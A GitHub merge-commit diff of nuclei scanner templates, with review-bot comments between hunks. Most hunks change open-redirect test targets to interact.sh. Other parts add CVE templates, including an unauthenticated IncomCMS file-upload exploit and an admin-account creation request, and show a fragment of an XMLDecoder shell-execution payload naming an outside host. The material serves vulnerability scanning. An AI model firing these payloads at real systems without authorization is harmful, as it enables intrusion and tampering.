Merge branch 'projectdiscovery:master' into dashboard

patch-1
MostInterestingBotInTheWorld 2022-06-06 10:12:35 -04:00 committed by GitHub
commit 8ad6525611
GPG Key ID: 4AEE18F83AFDEB23
120 changed files with 2425 additions and 1918 deletions


@ -1,13 +1,13 @@
cves/2021/CVE-2021-20137.yaml cves/2018/CVE-2018-14474.yaml
cves/2021/CVE-2021-24245.yaml cves/2018/CVE-2018-16761.yaml
cves/2021/CVE-2021-27519.yaml cves/2020/CVE-2020-29597.yaml
exposed-panels/gryphon-login.yaml cves/2021/CVE-2021-27748.yaml
exposed-panels/zyxel/zyxel-firewall-panel.yaml cves/2022/CVE-2022-29383.yaml
file/audit/cisco/configure-aaa-service.yaml cves/2022/CVE-2022-31268.yaml
file/audit/cisco/configure-service-timestamps-debug.yaml exposed-panels/eventum-panel.yaml
file/audit/cisco/configure-service-timestamps-logmessages.yaml exposures/files/appsettings-file-disclosure.yaml
file/audit/cisco/disable-ip-source-route.yaml exposures/files/django-secret-key.yaml
file/audit/cisco/disable-pad-service.yaml exposures/files/ftpconfig.yaml
file/audit/cisco/enable-secret-for-password-user-and-.yaml exposures/files/git-mailmap.yaml
file/audit/cisco/logging-enable.yaml exposures/files/php-ini.yaml
file/audit/cisco/set-and-secure-passwords.yaml vulnerabilities/other/phpok-sqli.yaml


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1191 | daffainfo | 565 | cves | 1196 | info | 1220 | http | 3263 | | cve | 1195 | daffainfo | 565 | cves | 1200 | info | 1230 | http | 3269 |
| panel | 524 | dhiyaneshdk | 424 | exposed-panels | 533 | high | 895 | file | 68 | | panel | 525 | dhiyaneshdk | 424 | exposed-panels | 535 | high | 899 | file | 76 |
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 681 | network | 50 | | lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 687 | network | 50 |
| xss | 379 | pdteam | 266 | technologies | 258 | critical | 421 | dns | 17 | | xss | 382 | pdteam | 268 | technologies | 258 | critical | 415 | dns | 17 |
| wordpress | 375 | geeknik | 181 | exposures | 205 | low | 186 | | | | wordpress | 376 | geeknik | 181 | exposures | 205 | low | 186 | | |
| rce | 302 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | | rce | 304 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 298 | princechaddha | 139 | workflows | 187 | | | | | | exposure | 298 | 0x_akoko | 139 | workflows | 187 | | | | |
| cve2021 | 291 | 0x_akoko | 139 | token-spray | 169 | | | | | | cve2021 | 294 | princechaddha | 139 | token-spray | 169 | | | | |
| wp-plugin | 274 | gy741 | 122 | default-logins | 96 | | | | | | wp-plugin | 275 | pussycat0x | 124 | default-logins | 96 | | | | |
| tech | 274 | pussycat0x | 116 | file | 68 | | | | | | tech | 274 | gy741 | 122 | file | 76 | | | | |
**264 directories, 3622 files**. **265 directories, 3636 files**.
</td> </td>
</tr> </tr>




@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1191 | daffainfo | 565 | cves | 1196 | info | 1220 | http | 3263 | | cve | 1195 | daffainfo | 565 | cves | 1200 | info | 1230 | http | 3269 |
| panel | 524 | dhiyaneshdk | 424 | exposed-panels | 533 | high | 895 | file | 68 | | panel | 525 | dhiyaneshdk | 424 | exposed-panels | 535 | high | 899 | file | 76 |
| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 681 | network | 50 | | lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 687 | network | 50 |
| xss | 379 | pdteam | 266 | technologies | 258 | critical | 421 | dns | 17 | | xss | 382 | pdteam | 268 | technologies | 258 | critical | 415 | dns | 17 |
| wordpress | 375 | geeknik | 181 | exposures | 205 | low | 186 | | | | wordpress | 376 | geeknik | 181 | exposures | 205 | low | 186 | | |
| rce | 302 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | | rce | 304 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
| exposure | 298 | princechaddha | 139 | workflows | 187 | | | | | | exposure | 298 | 0x_akoko | 139 | workflows | 187 | | | | |
| cve2021 | 291 | 0x_akoko | 139 | token-spray | 169 | | | | | | cve2021 | 294 | princechaddha | 139 | token-spray | 169 | | | | |
| wp-plugin | 274 | gy741 | 122 | default-logins | 96 | | | | | | wp-plugin | 275 | pussycat0x | 124 | default-logins | 96 | | | | |
| tech | 274 | pussycat0x | 116 | file | 68 | | | | | | tech | 274 | gy741 | 122 | file | 76 | | | | |


@ -9,6 +9,16 @@
"email": "" "email": ""
} }
}, },
{
"author": "Dhiyaneshwaran",
"links": {
"github": "https://github.com/DhiyaneshGeek",
"twitter": "https://twitter.com/DhiyaneshDK",
"linkedin": "https://www.linkedin.com/in/dhiyaneshwaran-b-27947a131/",
"website": "https://dhiyaneshgeek.github.io/",
"email": ""
}
},
{ {
"author": "duty_1g", "author": "duty_1g",
"links": { "links": {


@ -19,13 +19,13 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/awstats/awredir.pl?url=example.com' - '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com' - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'
stop-at-first-match: true stop-at-first-match: true
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/02/13 # Enhanced by mp on 2022/02/13


@ -18,12 +18,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/index.action?redirect:http://www.example.com/" - "{{BaseURL}}/index.action?redirect:http://www.interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header
# Enhanced by mp on 2022/02/21 # Enhanced by mp on 2022/02/21


@ -19,12 +19,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/" - "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# Enhanced by mp on 2022/02/25 # Enhanced by mp on 2022/02/25


@ -20,10 +20,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://example.com' - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -17,10 +17,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com" - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header


@ -16,10 +16,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://example.com/" - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header


@ -20,10 +20,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/login?redir=http://www.example.com' - '{{BaseURL}}/login?redir=http://www.interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -42,7 +42,7 @@ requests:
<string>-c</string> <string>-c</string>
</void> </void>
<void index="2"> <void index="2">
<string>example.com</string> <string>interact.sh</string>
</void> </void>
</array> </array>
<void method="start"/></void> <void method="start"/></void>
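Review bot: `interact.sh` is a fixed literal here, so the scanner never observes the outbound connection that the payload ending in `<void method="start"/>` is meant to provoke, and the template still has to infer success from the HTTP response alone. nuclei's `{{interactsh-url}}` placeholder, paired with a `part: interactsh_protocol` word matcher, would turn that inference into a positive confirmation; the same applies to the `wget http://interact.sh` payload in the OpenTSDB hunk further down. Pointing scanned hosts at a static public domain also sends their traffic to a third party that nobody in the scan is watching. The enclosing raw request starts and ends outside this hunk.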


@ -26,7 +26,7 @@ requests:
uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
- | - |
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com HTTP/1.1 GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
cookie-reuse: true cookie-reuse: true
@ -34,4 +34,4 @@ requests:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -20,12 +20,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com" - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"
matchers: matchers:
- type: word - type: word
words: words:
- 'noresize src="/\example.com?configName=' - 'noresize src="/\interact.sh?configName='
part: body part: body
# Enhanced by mp on 2022/04/14 # Enhanced by mp on 2022/04/14


@ -19,12 +19,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}//example.com" - "{{BaseURL}}//interact.sh"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com" - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?interact.sh"
part: header part: header
# Enhanced by mp on 2022/04/26 # Enhanced by mp on 2022/04/26


@ -19,10 +19,10 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -23,10 +23,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fattacker.com' - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh'
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- '<META http-equiv="Refresh" content="0;URL=http://attacker.com">' - '<META http-equiv="Refresh" content="0;URL=http://interact.sh">'


@ -0,0 +1,32 @@
id: CVE-2018-14474
info:
name: OrangeForum 1.4.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
views/auth.go in Orange Forum 1.4.0 allows Open Redirection via the next parameter to /login or /signup.
reference:
- https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa
- https://seclists.org/fulldisclosure/2019/Jan/32
- https://vuldb.com/?id.122045
- https://nvd.nist.gov/vuln/detail/CVE-2018-14474
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-14474
cwe-id: CWE-601
tags: cve,cve2018,redirect,orangeforum,oss
requests:
- method: GET
path:
- '{{BaseURL}}/login?next=http://interact.sh/?app.scan/'
- '{{BaseURL}}/signup?next=http://interact.sh/?app.scan/'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
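Review bot: The `?app.scan/` suffix on both payload URLs is unexplained; if it is needed to get past Orange Forum's handling of the `next` parameter a comment should say so, otherwise a plain `http://interact.sh/` reads more clearly and still satisfies the Location regex. The template also carries no `metadata` block, whereas the new CVE-2020-29597 template in this commit records `verified`; the new CVE-2018-16761 template has the same gap. Recording whether the check was verified against a real instance is what lets a later reader judge false-positive risk.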


@ -22,7 +22,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}//www.example.com" - "{{BaseURL}}//www.interact.sh"
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -31,6 +31,6 @@ requests:
- 301 - 301
- type: word - type: word
words: words:
- "Location: https://www.example.com" - "Location: https://www.interact.sh"
- "Location: http://www.example.com" - "Location: http://www.interact.sh"
part: header part: header


@ -19,12 +19,12 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.example.com' - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/26 # Enhanced by mp on 2022/04/26


@ -0,0 +1,32 @@
id: CVE-2018-16761
info:
name: Eventum v3.3.4 - Open Redirect
author: 0x_Akoko
severity: medium
description: |
Eventum before 3.4.0 has an open redirect vulnerability.
reference:
- https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/
- https://github.com/eventum/eventum/
- https://www.cvedetails.com/cve/CVE-2018-16761/
- https://github.com/eventum/eventum/releases/tag/v3.4.0
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-16761
cwe-id: CWE-601
tags: cve,cve2018,redirect,eventum,oss
requests:
- method: GET
path:
- '{{BaseURL}}/select_project.php?url=http://interact.sh'
- '{{BaseURL}}/clock_status.php?current_page=http://interact.sh'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
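Review bot: The name pins `Eventum v3.3.4` while the description says every version before 3.4.0 is affected; `name: Eventum <3.4.0 - Open Redirect` agrees with the description and with the v3.4.0 release reference listed under it. The description sentence also only restates the title; naming the two parameters the requests exercise (`url` on select_project.php and `current_page` on clock_status.php) would tell a reader what the template actually checks.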


@ -22,8 +22,8 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com' - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com' - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
@ -32,7 +32,7 @@ requests:
- type: word - type: word
part: body part: body
words: words:
- "self.location = 'http://www.example.com'" - "self.location = 'http://www.interact.sh'"
- type: status - type: status
status: status:


@ -20,7 +20,7 @@ requests:
path: path:
- '{{BaseURL}}/OA_HTML/lcmServiceController.jsp' - '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://example.com"> body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://interact.sh">
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -21,8 +21,8 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/redirector.php?url=https://attacker.com' - '{{BaseURL}}/redirector.php?url=https://interact.sh'
- '{{BaseURL}}/redirector.php?do=nodelay&url=https://attacker.com' - '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh'
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -30,7 +30,7 @@ requests:
- type: word - type: word
part: body part: body
words: words:
- '<meta http-equiv="refresh" content="0; URL=https://attacker.com">' - '<meta http-equiv="refresh" content="0; URL=https://interact.sh">'
- type: status - type: status
status: status:


@ -19,10 +19,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/modules/babel/redirect.php?newurl=http://example.com' - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -25,10 +25,10 @@ requests:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
body: | body: |
success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass success=%2Fshare%2Fpage%2F&failure=:\\interact.sh&username=baduser&password=badpass
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$" - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"


@ -25,7 +25,7 @@ requests:
headers: headers:
Content-Type: application/json Content-Type: application/json
body: | body: |
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"} {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@interact.sh", "realname": "poc"}
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -20,10 +20,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://example.com' - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -20,10 +20,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/updating.jsp?url=https://example.com/" - "{{BaseURL}}/updating.jsp?url=https://interact.sh/"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header part: header


@ -21,13 +21,13 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/index.php?redirect=/\/evil.com/' - '{{BaseURL}}/index.php?redirect=/\/interact.sh/'
- '{{BaseURL}}/index.php?redirect=//evil.com' - '{{BaseURL}}/index.php?redirect=//interact.sh'
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
part: header part: header
# Enhanced by mp on 2022/05/04 # Enhanced by mp on 2022/05/04


@ -20,12 +20,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/%252f%255cexample.com%252fa%253fb/' - '{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/'
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
part: header part: header
# Enhanced by mp on 2022/05/04 # Enhanced by mp on 2022/05/04


@ -30,7 +30,7 @@ requests:
"upstream":{ "upstream":{
"type":"roundrobin", "type":"roundrobin",
"nodes":{ "nodes":{
"example.com:80":1 "interact.sh:80":1
} }
} }
} }


@ -28,7 +28,7 @@ requests:
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0 btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
- | - |
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2 GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
Host: {{Hostname}} Host: {{Hostname}}
cookie-reuse: true cookie-reuse: true
@ -36,4 +36,4 @@ requests:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1


@ -19,10 +19,10 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com" - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"
matchers: matchers:
- type: regex - type: regex
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
part: header part: header


@ -19,10 +19,10 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?url=http://example.com' - '{{BaseURL}}/?url=http://interact.sh'
matchers: matchers:
- type: regex - type: regex
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'


@ -17,14 +17,14 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com' - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: header part: header
words: words:
- "Location: https://example.com" - "Location: https://interact.sh"
- type: status - type: status
status: status:


@ -0,0 +1,45 @@
id: CVE-2020-29597
info:
name: IncomCMS 2.0 - Arbitary files upload
author: princechaddha
severity: critical
description: |
IncomCMS 2.0 has a modules/uploader/showcase/script.php insecure file upload vulnerability. This vulnerability allows unauthenticated attackers to upload files into the server.
reference:
- https://github.com/Trhackno/CVE-2020-29597
- https://nvd.nist.gov/vuln/detail/CVE-2020-29597
- https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md
- https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29597
cwe-id: CWE-434
metadata:
verified: "true"
tags: cve,cve2020,incomcms,fileupload,intrusive
requests:
- raw:
- |
POST /incom/modules/uploader/showcase/script.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt
------WebKitFormBoundaryBEJZt0IK73M2mAbt
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.png"
Content-Type: image/png
------WebKitFormBoundaryBEJZt0IK73M2mAbt--
- |
GET /upload/userfiles/image/{{randstr}}.png HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- contains(body_1, '\"name\":\"{{randstr}}.png\"')
- status_code_2 == 200
condition: and
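Review bot: `Arbitary` in the name is a typo; `name: IncomCMS 2.0 - Arbitrary File Upload`. The second request then fetches the uploaded `{{randstr}}.png` but nothing removes it, so a positive result leaves a file under /upload/userfiles/image/ on the target; the `intrusive` tag is right, and the description should state that residue explicitly so operators know what to clean up. The multipart body also shows no content line between the `Content-Type: image/png` part header and the closing boundary — if a blank line was lost in rendering that is fine, otherwise the part is empty and the check is worth confirming against a test instance.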


